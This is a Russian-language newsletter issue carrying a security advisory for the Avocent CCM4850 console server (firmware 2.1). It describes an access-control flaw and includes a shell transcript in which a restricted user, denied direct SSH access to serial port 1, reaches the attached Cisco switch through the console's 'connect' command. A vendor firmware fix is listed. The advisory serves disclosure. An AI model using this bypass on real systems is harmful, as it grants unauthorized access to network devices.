Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпуск по безопасности.


Информационный Канал Subscribe.Ru

Опасные продукты:
Avocents COM
Безопансность
Продукт: Avocents COM
Версия: S/W Version 2.1, CCM4850

Детали:
Avocents COM console server имеет недостаток, который позволяет использование системы управления доступом, через использование ssh со стандартным алгоритмом работы базы паролей. На современных консольных серверах вы можете установить основной порт для входа пользователей. Однако исследование показало, что в этом случае обращение к управлению терпит неудачу, если вы с помощью ssh работаете внутри консоли, применяя свою учетную запись, и затем активируете команду 'connect' для доступа к другому порту.
Использование:
TCP - порт 3101 - серийный порт 1
Использование mylocal дает доступ только ко 2 порту через 48. Прямой доступ 3101\TCP невозможен. Как всегда, при соединении к Avocent сначала используется mylocal-аккуант и потом команда соединения, позволяющая присоединится к этому порту.
В этом примере CISCO свитч соединен по последовательному порту 1:
~/console/lab-notizen/avo|19% ssh Admin@ccm
Admin@ccm's password:
Avocent CCM4850 S/W Version 2.1



>> показывает пользователя

User: Admin
Level: Appliance Administrator
Access: PALL,USER,SCON,SMON,PCON,BREAK
Groups:
Port Access: BY PORT
Locked: N/A
Last Login: 00 10:17:11

Port Username Duration Socket From Socket
CLI Admin 00 00:00:04 22 0.0.0.0(58798)

>> mylocal-аккуант

User: mylocal
Level: User
Access: P2-48,BREAK
Groups:
Port Access: BY PORT
Locked: NO
Last Login: 00 08:10:24

>>
>>соединение к ccm закрыто

~/console/lab-notizen/avo|20% ssh mylocal@ccm -p 3101
mylocal@ccm's password:
Received disconnect from 192.168.100.209: 2: Access denied - No access to port 1
~/console/lab-notizen/avo|21% ssh mylocal@ccm
mylocal@ccm's password:
Avocent CCM4850 S/W Version 2.1



>> соединение к порту 1

Connected to Port: 1 9600,8,N,1,NONE

cisco#Connection to ccm closed.
~/console/lab-notizen/avo|22%

Исправление:
Производитель выпустил новую прошивку версии 2.3, скачать её можно на:
ftp://ftp.avocent.com/public/product-upgrades/$ds1800/CCMx50%20Series/CCMx50%27s_AV_2.3/
Если Вам нравится эта рассылка и Вы пользуетесь сведениями из неё, то можете поддержать автора, перечислив небольшое вознаграждение на R474348938531 или Z451490294903. Связаться со мной можно по ICQ 273214003.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться
Вспомнить пароль

В избранное